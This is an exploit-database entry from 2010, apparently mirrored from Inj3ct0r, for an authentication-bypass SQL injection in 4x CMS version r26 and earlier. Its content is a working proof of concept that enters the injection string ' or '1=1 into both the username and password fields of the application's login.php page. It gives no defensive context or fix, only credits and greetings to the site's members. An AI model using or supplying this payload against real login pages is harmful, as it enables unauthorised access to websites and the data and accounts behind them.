4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability
# Published : 2010-03-21
# Author : cr4wl3r
# Previous Title : NotSopureEdit <= 1.4.1 Remote File Include Vulnerability
# Next Title : joomla component Gift Exchange com_giftexchange (pkg) Remote Sql Injection

=======================================================
4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability
=======================================================


[+] 4xcms <= r26 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11392
[+] Download : http://code.google.com/p/4xcms/downloads/list

[+] PoC: [path]/login.php
    User : ' or '1=1
    Pass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]